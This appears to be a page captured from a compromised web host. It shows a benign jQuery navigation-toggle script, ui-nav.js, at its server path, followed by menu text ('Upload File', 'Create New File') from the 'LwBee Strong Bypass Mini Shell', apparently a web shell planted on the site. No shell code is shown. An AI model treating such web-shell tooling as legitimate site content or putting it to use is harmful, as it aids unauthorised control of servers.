/home/storage/f/3f/a5/aloic1/public_html/assets/dashboard/js/scripts/ui-nav.js
(function ($) {
  "use strict";
  
  $(document).on('click', '[ui-nav] a', function (e) {
    var $this = $(e.target), $active, $li;
    $this.is('a') || ($this = $this.closest('a'));
    
    $li = $this.parent();
    $active = $li.siblings( ".active" );
    $li.toggleClass('active');
    $active.removeClass('active');
  });
})(jQuery);
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File